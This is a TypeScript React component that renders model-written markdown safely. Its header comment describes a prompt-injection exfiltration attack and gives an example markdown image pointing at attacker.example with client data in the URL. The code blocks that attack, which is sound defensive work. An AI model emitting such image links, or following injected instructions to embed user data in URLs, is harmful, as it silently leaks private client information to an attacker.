// The markdown renderer for anything a model wrote.
//
// Security (prompt-injection exfiltration, found in review of #2052): model
// output can carry a markdown image such as
//   ![x](https://attacker.example/?d=<client facts>)
// which react-markdown renders as an <img> that the browser fetches with zero
// clicks, leaking whatever the injected instructions told the model to put in
// the URL. This wrapper therefore:
//   - never renders an image: the `img` element is replaced by inert text and
//     its `src` is dropped by `urlTransform` before any component sees it;
//   - keeps react-markdown's default link sanitizing (http/https/mailto and
//     relative only -- `javascript:` and `data:` become empty);
//   - never enables raw HTML (no rehype-raw), so a literal <img> stays text.
// Callers may override other elements, but never `img`.
import ReactMarkdown, { defaultUrlTransform, type Components, type Options } from 'react-markdown';

const IMAGE_REMOVED_TEXT = '[image removed]';

function RemovedImage({ alt }: { alt?: string }) {
  const label = alt?.trim();
  return (
    <span className="safe-markdown__image-removed" data-testid="markdown-image-removed">
      {label ? `[image removed: ${label}]` : IMAGE_REMOVED_TEXT}
    </span>
  );
}

function safeUrlTransform(url: string, key: string): string | null {
  // An image source is never fetched, whatever the element renders as.
  if (key === 'src' || key === 'srcSet' || key === 'poster') return null;
  return defaultUrlTransform(url);
}

export type SafeMarkdownProps = Omit<Options, 'urlTransform' | 'rehypePlugins' | 'skipHtml'>;

export default function SafeMarkdown({ components, ...props }: SafeMarkdownProps) {
  const safeComponents: Components = { ...components, img: RemovedImage };
  return <ReactMarkdown {...props} components={safeComponents} urlTransform={safeUrlTransform} />;
}
